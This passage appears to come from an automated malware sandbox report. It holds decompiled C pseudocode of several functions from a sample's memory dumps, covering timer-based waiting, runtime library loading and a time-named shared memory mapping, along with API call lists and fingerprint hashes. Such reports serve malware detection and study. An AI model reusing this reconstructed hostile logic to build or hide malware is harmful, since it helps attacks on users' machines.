								_t109 = E005E5800(_t149, _t149, _t155 >> 1);
								_t148 = _v28;
								 *_a12 = _t109;
							}
						}
						goto L19;
					} else {
						if(_a8 != 0) {
							L19:
							E005EA734(_a4);
							if(_v12 == 0 || _v12 == 0x10d2) {
								goto L22;
							} else {
								goto L21;
							}
						}
						_v12 = _v12 & 0x00000000;
						goto L16;
					}
				}
			}






















































                                                          0x005e4ab6
                                                          0x005e4ab6
                                                          0x005e4ab6
                                                          0x005e4abf
                                                          0x005e4ac8
                                                          0x005e4aca
                                                          0x005e4aca
                                                          0x005e4ad7
                                                          0x005e4ae2
                                                          0x005e4ae5
                                                          0x005e4aea
                                                          0x005e4af3
                                                          0x005e4af6
                                                          0x005e4afb
                                                          0x005e4afe
                                                          0x005e4b03
                                                          0x005e4b06
                                                          0x005e4b12
                                                          0x005e4b1f
                                                          0x005e4b21
                                                          0x005e4b27
                                                          0x005e4b2c
                                                          0x005e4b37
                                                          0x005e4b39
                                                          0x005e4b3c
                                                          0x005e4b3e
                                                          0x005e4b43
                                                          0x005e4b49
                                                          0x005e4b4e
                                                          0x005e4b51
                                                          0x005e4b56
                                                          0x005e4b63
                                                          0x005e4b65
                                                          0x005e4b6b
                                                          0x005e4b75
                                                          0x005e4b75
                                                          0x005e4b77
                                                          0x005e4b7c
                                                          0x005e4b81
                                                          0x005e4b84
                                                          0x005e4b89
                                                          0x005e4b96
                                                          0x005e4b98
                                                          0x005e4ba6
                                                          0x005e4ba6
                                                          0x005e4ba8
                                                          0x005e4bb6
                                                          0x005e4bbb
                                                          0x005e4bbd
                                                          0x005e4bc2
                                                          0x005e4d83
                                                          0x005e4d8d
                                                          0x005e4d96
                                                          0x005e4bc8
                                                          0x005e4bd4
                                                          0x005e4bda
                                                          0x005e4bdf
                                                          0x005e4d77
                                                          0x005e4d81
                                                          0x00000000
                                                          0x005e4d81
                                                          0x005e4beb
                                                          0x005e4bf0
                                                          0x005e4bf9
                                                          0x005e4c0a
                                                          0x005e4c0e
                                                          0x005e4c17
                                                          0x005e4c1d
                                                          0x005e4c2c
                                                          0x005e4c33
                                                          0x005e4c3c
                                                          0x005e4c42
                                                          0x005e4d6b
                                                          0x005e4d75
                                                          0x00000000
                                                          0x005e4d75
                                                          0x005e4c4e
                                                          0x005e4c54
                                                          0x005e4c55
                                                          0x005e4c5a
                                                          0x005e4c5f
                                                          0x005e4d61
                                                          0x005e4d69
                                                          0x00000000
                                                          0x005e4d69
                                                          0x005e4c68
                                                          0x005e4c6f
                                                          0x005e4c77
                                                          0x005e4c7c
                                                          0x005e4c85
                                                          0x005e4c90
                                                          0x005e4c95
                                                          0x005e4c9a
                                                          0x005e4d99
                                                          0x005e4d4d
                                                          0x005e4d4d
                                                          0x005e4d52
                                                          0x005e4d5d
                                                          0x005e4d5f
                                                          0x00000000
                                                          0x005e4d5f
                                                          0x005e4ca4
                                                          0x005e4ca9
                                                          0x005e4cae
                                                          0x005e4cb3
                                                          0x005e4cbe
                                                          0x005e4cc3
                                                          0x005e4cc6
                                                          0x005e4ccc
                                                          0x005e4cd2
                                                          0x005e4cd8
                                                          0x005e4cdb
                                                          0x005e4ce1
                                                          0x005e4ce4
                                                          0x005e4ce9
                                                          0x005e4ced
                                                          0x005e4ced
                                                          0x005e4cf9
                                                          0x005e4d05
                                                          0x005e4d09
                                                          0x005e4d0b
                                                          0x005e4d10
                                                          0x005e4d12
                                                          0x005e4d17
                                                          0x005e4d1c
                                                          0x005e4d29
                                                          0x005e4d31
                                                          0x005e4d34
                                                          0x005e4d34
                                                          0x005e4d10
                                                          0x00000000
                                                          0x005e4cfb
                                                          0x005e4cff
                                                          0x005e4d36
                                                          0x005e4d39
                                                          0x005e4d42
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x005e4d42
                                                          0x005e4d01
                                                          0x00000000
                                                          0x005e4d01
                                                          0x005e4cf9

                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 005E4ACA
                                                          • wsprintfA.USER32 ref: 005E4B1A
                                                          • wsprintfA.USER32 ref: 005E4B37
                                                          • wsprintfA.USER32 ref: 005E4B63
                                                          • HeapFree.KERNEL32(00000000,?), ref: 005E4B75
                                                          • wsprintfA.USER32 ref: 005E4B96
                                                          • HeapFree.KERNEL32(00000000,?), ref: 005E4BA6
                                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 005E4BD4
                                                          • GetTickCount.KERNEL32 ref: 005E4BE5
                                                          • RtlEnterCriticalSection.NTDLL(01669570), ref: 005E4BF9
                                                          • RtlLeaveCriticalSection.NTDLL(01669570), ref: 005E4C17
                                                            • Part of subcall function 005E1BB6: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7742C740,?,?,005E20C2,?,016695B0), ref: 005E1BE1
                                                            • Part of subcall function 005E1BB6: lstrlen.KERNEL32(?,?,?,005E20C2,?,016695B0), ref: 005E1BE9
                                                            • Part of subcall function 005E1BB6: strcpy.NTDLL ref: 005E1C00
                                                            • Part of subcall function 005E1BB6: lstrcat.KERNEL32(00000000,?), ref: 005E1C0B
                                                            • Part of subcall function 005E1BB6: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,005E20C2,?,016695B0), ref: 005E1C28
                                                          • StrTrimA.SHLWAPI(00000000,005EC28C,?,016695B0), ref: 005E4C4E
                                                            • Part of subcall function 005E361A: lstrlen.KERNEL32(01669A78,00000000,00000000,7742C740,005E20ED,00000000), ref: 005E362A
                                                            • Part of subcall function 005E361A: lstrlen.KERNEL32(?), ref: 005E3632
                                                            • Part of subcall function 005E361A: lstrcpy.KERNEL32(00000000,01669A78), ref: 005E3646
                                                            • Part of subcall function 005E361A: lstrcat.KERNEL32(00000000,?), ref: 005E3651
                                                          • lstrcpy.KERNEL32(00000000,?), ref: 005E4C6F
                                                          • lstrcpy.KERNEL32(?,?), ref: 005E4C77
                                                          • lstrcat.KERNEL32(?,?), ref: 005E4C85
                                                          • lstrcat.KERNEL32(?,00000000), ref: 005E4C8B
                                                            • Part of subcall function 005E9070: lstrlen.KERNEL32(?,00000000,01669A98,00000000,005E8808,01669C76,?,?,?,?,?,63699BC3,00000005,005ED00C), ref: 005E9077
                                                            • Part of subcall function 005E9070: mbstowcs.NTDLL ref: 005E90A0
                                                            • Part of subcall function 005E9070: memset.NTDLL ref: 005E90B2
                                                          • wcstombs.NTDLL ref: 005E4D1C
                                                            • Part of subcall function 005E391F: SysAllocString.OLEAUT32(?), ref: 005E395A
                                                            • Part of subcall function 005E391F: IUnknown_QueryInterface_Proxy.RPCRT4(?,332C4425,?), ref: 005E39DD
                                                            • Part of subcall function 005EA734: HeapFree.KERNEL32(00000000,00000000,005E5637,00000000,?,?,00000000), ref: 005EA740
                                                          • HeapFree.KERNEL32(00000000,?,?), ref: 005E4D5D
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 005E4D69
                                                          • HeapFree.KERNEL32(00000000,?,?,016695B0), ref: 005E4D75
                                                          • HeapFree.KERNEL32(00000000,?), ref: 005E4D81
                                                          • RtlFreeHeap.NTDLL(00000000,?), ref: 005E4D8D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterInterface_LeaveProxyQueryStringUnknown_mbstowcsmemsetstrcpywcstombs
                                                          • String ID:
                                                          • API String ID: 603507560-0
                                                          • Opcode ID: a6564b511670c9722a67b8f3cd008d12e6191d74e91580ba0a3185be502d5440
                                                          • Instruction ID: 85f6585e9f79eb8cd6eefabc2aae5e0fcdf91ce9e6b178170d0672ca740616d6
                                                          • Opcode Fuzzy Hash: a6564b511670c9722a67b8f3cd008d12e6191d74e91580ba0a3185be502d5440
                                                          • Instruction Fuzzy Hash: 32915771900289AFCB19DFA6DC88AAE7FB9FF58310F144454F984DB220DB31D955EB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 005E51B0, Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 150timememoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 83%
                                                          			E005E51B0(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t60;
				long _t64;
				signed int _t65;
				void* _t68;
				void* _t70;
				signed int _t71;
				intOrPtr _t73;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t73 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x5ed240);
					_v20 = 0;
					_v16 = 0;
					L005EAF2E();
					_v36.LowPart = _t46;
					_v32 = _t73;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0x5ed26c; // 0x270
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x5ed24c = 5;
						} else {
							_t68 = E005E8D14(_t73); // executed
							if(_t68 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0x5ed260 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t71 = _v12;
						_t58 = _t71 << 4;
						_t21 =  &_v20; // 0x5e5d5e
						_t76 = _t80 + (_t71 << 4) - 0x54;
						_t72 = _t71 + 1;
						_v24 = _t71 + 1;
						_t60 = E005EA376(_t72, _t76, _t72, _t80 + _t58 - 0x58, _t76, _t21,  &_v16); // executed
						_v8.LowPart = _t60;
						if(_t60 != 0) {
							goto L17;
						}
						_t65 = _v24;
						_v12 = _t65;
						_t90 = _t65 - 3;
						if(_t65 != 3) {
							goto L6;
						} else {
							_v8.LowPart = E005E36B1(_t72, _t90,  &_v92, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t60 - 0x10d2;
						if(_t60 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x5ed244);
							goto L21;
						} else {
							__eflags =  *0x5ed248; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t60 = E005E6761();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x5ed248);
								L21:
								L005EAF2E();
								_v36.LowPart = _t60;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								_v8.LowPart = _t64;
								__eflags = _t64;
								if(_t64 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t70 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							HeapFree( *0x5ed238, 0, _t54);
						}
						_t78 =  &(_t78[4]);
						_t70 = _t70 - 1;
					} while (_t70 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}




























                                                          0x005e51b0
                                                          0x005e51c2
                                                          0x005e51c5
                                                          0x005e51d1
                                                          0x005e51d7
                                                          0x005e51dc
                                                          0x005e5343
                                                          0x005e51e2
                                                          0x005e51e2
                                                          0x005e51e4
                                                          0x005e51e9
                                                          0x005e51ea
                                                          0x005e51f0
                                                          0x005e51f3
                                                          0x005e51f6
                                                          0x005e5204
                                                          0x005e520f
                                                          0x005e5212
                                                          0x005e5214
                                                          0x005e5221
                                                          0x005e522b
                                                          0x005e522d
                                                          0x005e5232
                                                          0x005e5237
                                                          0x005e5242
                                                          0x005e5242
                                                          0x005e5239
                                                          0x005e5239
                                                          0x005e5240
                                                          0x00000000
                                                          0x00000000
                                                          0x005e5240
                                                          0x005e524c
                                                          0x00000000
                                                          0x005e524f
                                                          0x005e5253
                                                          0x005e525e
                                                          0x005e525e
                                                          0x005e5265
                                                          0x005e526e
                                                          0x005e5271
                                                          0x005e5275
                                                          0x005e527e
                                                          0x005e5281
                                                          0x005e5284
                                                          0x005e5289
                                                          0x005e528e
                                                          0x00000000
                                                          0x00000000
                                                          0x005e5290
                                                          0x005e5293
                                                          0x005e5296
                                                          0x005e5299
                                                          0x00000000
                                                          0x005e529b
                                                          0x005e52aa
                                                          0x005e52aa
                                                          0x00000000
                                                          0x005e52d8
                                                          0x005e52d8
                                                          0x005e52dd
                                                          0x005e52fc
                                                          0x005e52fe
                                                          0x005e5303
                                                          0x005e5304
                                                          0x00000000
                                                          0x005e52df
                                                          0x005e52df
                                                          0x005e52e5
                                                          0x00000000
                                                          0x005e52e7
                                                          0x005e52e7
                                                          0x005e52ec
                                                          0x005e52ee
                                                          0x005e52f3
                                                          0x005e52f4
                                                          0x005e530a
                                                          0x005e530a
                                                          0x005e5312
                                                          0x005e531d
                                                          0x005e5320
                                                          0x005e532b
                                                          0x005e532d
                                                          0x005e5330
                                                          0x005e5332
                                                          0x00000000
                                                          0x005e5338
                                                          0x00000000
                                                          0x005e5338
                                                          0x005e5332
                                                          0x005e52e5
                                                          0x00000000
                                                          0x005e52dd
                                                          0x005e52ad
                                                          0x005e52af
                                                          0x005e52b2
                                                          0x005e52b3
                                                          0x005e52b3
                                                          0x005e52b7
                                                          0x005e52c1
                                                          0x005e52c1
                                                          0x005e52c7
                                                          0x005e52ca
                                                          0x005e52ca
                                                          0x005e52d0
                                                          0x005e52d0
                                                          0x005e534d
                                                          0x00000000

                                                          APIs
                                                          • memset.NTDLL ref: 005E51C5
                                                          • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 005E51D1
                                                          • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 005E51F6
                                                          • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 005E5212
                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 005E522B
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 005E52C1
                                                          • CloseHandle.KERNEL32(?), ref: 005E52D0
                                                          • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 005E530A
                                                          • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,^]^,?), ref: 005E5320
                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 005E532B
                                                            • Part of subcall function 005E8D14: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,01669368,00000000,?,74B5F710,00000000,74B5F730), ref: 005E8D63
                                                            • Part of subcall function 005E8D14: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,016693A0,?,00000000,30314549,00000014,004F0053,0166935C), ref: 005E8E00
                                                            • Part of subcall function 005E8D14: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,005E523E), ref: 005E8E12
                                                          • GetLastError.KERNEL32 ref: 005E533D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                                          • String ID: ^]^
                                                          • API String ID: 3521023985-447055170
                                                          • Opcode ID: 33dc7e3ac7872409d08092e38e481ff4559bc827206571f5146cf78bc796de62
                                                          • Instruction ID: 4cec46c5e35cd41653fab27a4585e85c6bba0ea3f32928870786c812981edae5
                                                          • Opcode Fuzzy Hash: 33dc7e3ac7872409d08092e38e481ff4559bc827206571f5146cf78bc796de62
                                                          • Instruction Fuzzy Hash: D151AF74801268EBCF19DF96DC88DEEBFB8FF49724F204615F590A6190E7309A44DBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 005EAC55, Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209libraryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 51%
                                                          			E005EAC55(long _a4, long _a8) {
				signed int _v8;
				intOrPtr _v16;
				LONG* _v28;
				long _v40;
				long _v44;
				long _v48;
				CHAR* _v52;
				long _v56;
				CHAR* _v60;
				long _v64;
				signed int* _v68;
				char _v72;
				signed int _t76;
				signed int _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t90;
				intOrPtr* _t95;
				intOrPtr* _t98;
				struct HINSTANCE__* _t99;
				void* _t102;
				intOrPtr* _t104;
				void* _t115;
				long _t116;
				void _t125;
				void* _t131;
				signed short _t133;
				struct HINSTANCE__* _t138;
				signed int* _t139;

				_t139 = _a4;
				_v28 = _t139[2] + 0x5e0000;
				_t115 = _t139[3] + 0x5e0000;
				_t131 = _t139[4] + 0x5e0000;
				_v8 = _t139[7];
				_v60 = _t139[1] + 0x5e0000;
				_v16 = _t139[5] + 0x5e0000;
				_v64 = _a8;
				_v72 = 0x24;
				_v68 = _t139;
				_v56 = 0;
				asm("stosd");
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				if(( *_t139 & 0x00000001) == 0) {
					_a8 =  &_v72;
					RaiseException(0xc06d0057, 0, 1,  &_a8);
					return 0;
				}
				_t138 =  *_v28;
				_t76 = _a8 - _t115 >> 2 << 2;
				_t133 =  *(_t131 + _t76);
				_a4 = _t76;
				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
				_v56 = _t80;
				_t81 = _t133 + 0x5e0002;
				if(_t80 == 0) {
					_t81 = _t133 & 0x0000ffff;
				}
				_v52 = _t81;
				_t82 =  *0x5ed1a0; // 0x0
				_t116 = 0;
				if(_t82 == 0) {
					L6:
					if(_t138 != 0) {
						L18:
						_t83 =  *0x5ed1a0; // 0x0
						_v48 = _t138;
						if(_t83 != 0) {
							_t116 =  *_t83(2,  &_v72);
						}
						if(_t116 != 0) {
							L32:
							 *_a8 = _t116;
							L33:
							_t85 =  *0x5ed1a0; // 0x0
							if(_t85 != 0) {
								_v40 = _v40 & 0x00000000;
								_v48 = _t138;
								_v44 = _t116;
								 *_t85(5,  &_v72);
							}
							return _t116;
						} else {
							if(_t139[5] == _t116 || _t139[7] == _t116) {
								L27:
								_t116 = GetProcAddress(_t138, _v52);
								if(_t116 == 0) {
									_v40 = GetLastError();
									_t90 =  *0x5ed19c; // 0x0
									if(_t90 != 0) {
										_t116 =  *_t90(4,  &_v72);
									}
									if(_t116 == 0) {
										_a4 =  &_v72;
										RaiseException(0xc06d007f, _t116, 1,  &_a4);
										_t116 = _v44;
									}
								}
								goto L32;
							} else {
								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
									_t116 =  *(_a4 + _v16);
									if(_t116 != 0) {
										goto L32;
									}
								}
								goto L27;
							}
						}
					}
					_t98 =  *0x5ed1a0; // 0x0
					if(_t98 == 0) {
						L9:
						_t99 = LoadLibraryA(_v60); // executed
						_t138 = _t99;
						if(_t138 != 0) {
							L13:
							if(InterlockedExchange(_v28, _t138) == _t138) {
								FreeLibrary(_t138);
							} else {
								if(_t139[6] != 0) {
									_t102 = LocalAlloc(0x40, 8);
									if(_t102 != 0) {
										 *(_t102 + 4) = _t139;
										_t125 =  *0x5ed198; // 0x0
										 *_t102 = _t125;
										 *0x5ed198 = _t102;
									}
								}
							}
							goto L18;
						}
						_v40 = GetLastError();
						_t104 =  *0x5ed19c; // 0x0
						if(_t104 == 0) {
							L12:
							_a8 =  &_v72;
							RaiseException(0xc06d007e, 0, 1,  &_a8);
							return _v44;
						}
						_t138 =  *_t104(3,  &_v72);
						if(_t138 != 0) {
							goto L13;
						}
						goto L12;
					}
					_t138 =  *_t98(1,  &_v72);
					if(_t138 != 0) {
						goto L13;
					}
					goto L9;
				}
				_t116 =  *_t82(0,  &_v72);
				if(_t116 != 0) {
					goto L33;
				}
				goto L6;
			}


































                                                          0x005eac64
                                                          0x005eac7a
                                                          0x005eac80
                                                          0x005eac82
                                                          0x005eac87
                                                          0x005eac8d
                                                          0x005eac92
                                                          0x005eac95
                                                          0x005eaca3
                                                          0x005eacaa
                                                          0x005eacad
                                                          0x005eacb0
                                                          0x005eacb1
                                                          0x005eacb4
                                                          0x005eacb7
                                                          0x005eacba
                                                          0x005eacbf
                                                          0x005eacce
                                                          0x00000000
                                                          0x005eacd4
                                                          0x005eacde
                                                          0x005eace8
                                                          0x005eaced
                                                          0x005eacef
                                                          0x005eacf9
                                                          0x005eacfc
                                                          0x005eacff
                                                          0x005ead05
                                                          0x005ead07
                                                          0x005ead07
                                                          0x005ead0a
                                                          0x005ead0d
                                                          0x005ead12
                                                          0x005ead16
                                                          0x005ead29
                                                          0x005ead2b
                                                          0x005eadd3
                                                          0x005eadd3
                                                          0x005eadda
                                                          0x005eaddd
                                                          0x005eade7
                                                          0x005eade7
                                                          0x005eadeb
                                                          0x005eae69
                                                          0x005eae6c
                                                          0x005eae6e
                                                          0x005eae6e
                                                          0x005eae75
                                                          0x005eae77
                                                          0x005eae81
                                                          0x005eae84
                                                          0x005eae87
                                                          0x005eae87
                                                          0x00000000
                                                          0x005eaded
                                                          0x005eadf0
                                                          0x005eae1e
                                                          0x005eae28
                                                          0x005eae2c
                                                          0x005eae34
                                                          0x005eae37
                                                          0x005eae3e
                                                          0x005eae48
                                                          0x005eae48
                                                          0x005eae4c
                                                          0x005eae51
                                                          0x005eae60
                                                          0x005eae66
                                                          0x005eae66
                                                          0x005eae4c
                                                          0x00000000
                                                          0x005eadf7
                                                          0x005eadfa
                                                          0x005eae02
                                                          0x005eae17
                                                          0x005eae1c
                                                          0x00000000
                                                          0x00000000
                                                          0x005eae1c
                                                          0x00000000
                                                          0x005eae02
                                                          0x005eadf0
                                                          0x005eadeb
                                                          0x005ead31
                                                          0x005ead38
                                                          0x005ead48
                                                          0x005ead4b
                                                          0x005ead51
                                                          0x005ead55
                                                          0x005ead98
                                                          0x005eada4
                                                          0x005eadcd
                                                          0x005eada6
                                                          0x005eadaa
                                                          0x005eadb0
                                                          0x005eadb8
                                                          0x005eadba
                                                          0x005eadbd
                                                          0x005eadc3
                                                          0x005eadc5
                                                          0x005eadc5
                                                          0x005eadb8
                                                          0x005eadaa
                                                          0x00000000
                                                          0x005eada4
                                                          0x005ead5d
                                                          0x005ead60
                                                          0x005ead67
                                                          0x005ead77
                                                          0x005ead7a
                                                          0x005ead8a
                                                          0x00000000
                                                          0x005ead90
                                                          0x005ead71
                                                          0x005ead75
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x005ead75
                                                          0x005ead42
                                                          0x005ead46
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x005ead46
                                                          0x005ead1f
                                                          0x005ead23
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000

                                                          APIs
                                                          • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 005EACCE
                                                          • LoadLibraryA.KERNELBASE(?), ref: 005EAD4B
                                                          • GetLastError.KERNEL32 ref: 005EAD57
                                                          • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 005EAD8A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                                          • String ID: $
                                                          • API String ID: 948315288-3993045852
                                                          • Opcode ID: 9f68fd93eefb90fe84ce626d48f82f91e3dfdf871eb8e539949585994fa8afba
                                                          • Instruction ID: a54a53954ef2934dc3c98c2ff2bf53f5bcbe4d079e305d34fd3dd217c6874c87
                                                          • Opcode Fuzzy Hash: 9f68fd93eefb90fe84ce626d48f82f91e3dfdf871eb8e539949585994fa8afba
                                                          • Instruction Fuzzy Hash: 16816C71A00345EFDB28CFA9C984AAEBBF5FF58310F148429E985DB250E770E905CB61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 10001ADA, Relevance: 13.6, APIs: 9, Instructions: 81filetimeCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 69%
                                                          			E10001ADA(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L10002130();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x10004144;
				_push(_t15 + 0x1000505e);
				_push(_t15 + 0x10005054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L1000212A();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x10004148, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}














                                                          0x10001ada
                                                          0x10001ae3
                                                          0x10001ae7
                                                          0x10001aed
                                                          0x10001af2
                                                          0x10001af7
                                                          0x10001afa
                                                          0x10001afd
                                                          0x10001b02
                                                          0x10001b03
                                                          0x10001b06
                                                          0x10001b11
                                                          0x10001b18
                                                          0x10001b1c
                                                          0x10001b1e
                                                          0x10001b1f
                                                          0x10001b22
                                                          0x10001b27
                                                          0x10001b31
                                                          0x10001b33
                                                          0x10001b33
                                                          0x10001b47
                                                          0x10001b4d
                                                          0x10001b51
                                                          0x10001ba1
                                                          0x10001b53
                                                          0x10001b5c
                                                          0x10001b72
                                                          0x10001b7a
                                                          0x10001b8c
                                                          0x10001b90
                                                          0x00000000
                                                          0x00000000
                                                          0x10001b7c
                                                          0x10001b7f
                                                          0x10001b84
                                                          0x10001b86
                                                          0x10001b86
                                                          0x10001b67
                                                          0x10001b69
                                                          0x10001b92
                                                          0x10001b93
                                                          0x10001b93
                                                          0x10001b5c
                                                          0x10001ba9

                                                          APIs
                                                          • GetSystemTimeAsFileTime.KERNEL32(?), ref: 10001AE7
                                                          • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 10001AFD
                                                          • _snwprintf.NTDLL ref: 10001B22
                                                          • CreateFileMappingW.KERNELBASE(000000FF,10004148,00000004,00000000,?,?), ref: 10001B47
                                                          • GetLastError.KERNEL32 ref: 10001B5E
                                                          • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 10001B72
                                                          • GetLastError.KERNEL32 ref: 10001B8A
                                                          • CloseHandle.KERNEL32(00000000), ref: 10001B93
                                                          • GetLastError.KERNEL32 ref: 10001B9B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.490150047.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.490223790.0000000010005000.00000040.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                          • String ID:
                                                          • API String ID: 1724014008-0
                                                          • Opcode ID: 2e8302c24db467e9b5466d5654d080b83219e3fbe8e67ba6f678f57f6a515046
                                                          • Instruction ID: bcc887d71675999c673e285f1704182bf9803c61a9668b0f160e92206cf9e2cc
                                                          • Opcode Fuzzy Hash: 2e8302c24db467e9b5466d5654d080b83219e3fbe8e67ba6f678f57f6a515046
                                                          • Instruction Fuzzy Hash: 50216DB6900118BFF711EFA4CC84EDE77ADEB543D0F118066FA05D7154EB3099468B61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

